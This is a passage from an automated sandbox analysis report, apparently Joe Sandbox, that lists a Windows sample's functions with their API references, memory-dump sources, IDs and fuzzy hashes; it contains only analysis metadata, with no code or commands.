                                                                                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                                                                                                                                                                                                                                                                                                                              Function 00433CE7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                                              Function 0043CE4B Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: BG3i@
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2407888476
                                                                                                                                                                                                                                                                                                                              • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1d57165ebf75e2395586178747a5147ed71ba924114eacc5dbe4d8b8235841a2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF615771600605AADB386A2898D6BBF63A6EB4D718F10391BE543FB3C1D71DDD42831E
                                                                                                                                                                                                                                                                                                                              Function 0043CC1C Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b96fbfb60640764a27c773ebaff073e85ef5750e910638ac9767c22e4461be8a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 485168716006045BDB34466885DA7BF6B959B0E704F18352FE48AFB382C61EEE02975E
                                                                                                                                                                                                                                                                                                                              Function 1000ED88 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 521cadecbf0dbf94cfc9e34849e97eec2a057b05bd1939a5920eb9118d02db41
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 03843fba12bae94d977d56bff66045403ce8b7a74cc569ee4f5cddf028992ecb
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 521cadecbf0dbf94cfc9e34849e97eec2a057b05bd1939a5920eb9118d02db41
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66518971A047CE97FB60C964C9557BF63DADB413C0F14092EE842FB69EC606ED429352
                                                                                                                                                                                                                                                                                                                              Function 1000EFB7 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 1e96738f81d14b5048eeb29d1462cf2f0247e3c8161b61c71e63af6480e2836e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8e2d616ecf95476bf76660384782fdbfe64fd0152a42d7bb4c674480466e99f6
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e96738f81d14b5048eeb29d1462cf2f0247e3c8161b61c71e63af6480e2836e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14511371A007859BFB60C964C852BFF73DADB023C0F10051DE98297E8BD656AE46B361
                                                                                                                                                                                                                                                                                                                              Function 00426E83 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2dad8dda13a96ac29719e0110185aa8107b7b917685da963ee6e6edef41cb95d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3416576A183158FC314CF29D18061BFBE1FBC8314F568A2EF99693350D679E980CB86
                                                                                                                                                                                                                                                                                                                              Function 00437160 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: >G
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-1296849874
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: aab5066b8351c21b9abf1b6184216a89ccb323a2d5e30b0bcb97f0d730efd77d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08112BF724808243DE74863DC8B46B7A795EBCD321F2C637BD0C14BB58D32A99459908
                                                                                                                                                                                                                                                                                                                              Function 02847194 Relevance: .8, Instructions: 751COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f033e03191321320cfbbf431bb7b97f25ea3351a968e727611f40923ece5cd99
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD627B396083598FD324CF28C48066AFBE1FF85344F154A2DE9A9CB351EB75D949CB42
                                                                                                                                                                                                                                                                                                                              Function 10032249 Relevance: .8, Instructions: 751COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 661f8dc1abccfe97b5e643cefb8d9ec9f9f07c15d965e7528ef90cccb633838c
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 336422a7085196201aa282f05720e8470f05034f91c22384aa2eabef4bec5ef2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 661f8dc1abccfe97b5e643cefb8d9ec9f9f07c15d965e7528ef90cccb633838c
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE6288316183A58FD325CF28C48465ABBF1FF89385F118A2DE9E58B360E731D949CB42
                                                                                                                                                                                                                                                                                                                              Function 0044C749 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ab2fb9cf530b2f7fc05e48a1b2542d0b548931935014995ce621e12a70c45bd8
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6324621D29F414DE7639634C862336A649AFB73C5F18D737E81AB5AAAEF2CC4C34105
                                                                                                                                                                                                                                                                                                                              Function 0041E5EF Relevance: .6, Instructions: 606COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 56ea352148e3c774f87dcc4cf0de5d49bee8f4798448973f894b3d9cfc24b1ba
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 00ae404e09403cbabe28ca0a0a4d3aceb2ea5bd9e999d2a250848967357f0a7a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56ea352148e3c774f87dcc4cf0de5d49bee8f4798448973f894b3d9cfc24b1ba
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E532E3796083469BD714CF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                                                                                                                                                                                                                                                                                              Function 004267DB Relevance: .4, Instructions: 437COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 63c6752c91fa09a59911cbec739b695d928ea4d41f79e3f210d04f564ca51bf4
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9583adf114605d02d5e2e19679ce9bf42d3b47f395d82ba1fcfe18c7509b5e77
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63c6752c91fa09a59911cbec739b695d928ea4d41f79e3f210d04f564ca51bf4
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59028E717046518FD318CF2EE880536B7E1AF8E301B46867EE586C7391EB34E922CB95
                                                                                                                                                                                                                                                                                                                              Function 00426264 Relevance: .4, Instructions: 377COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
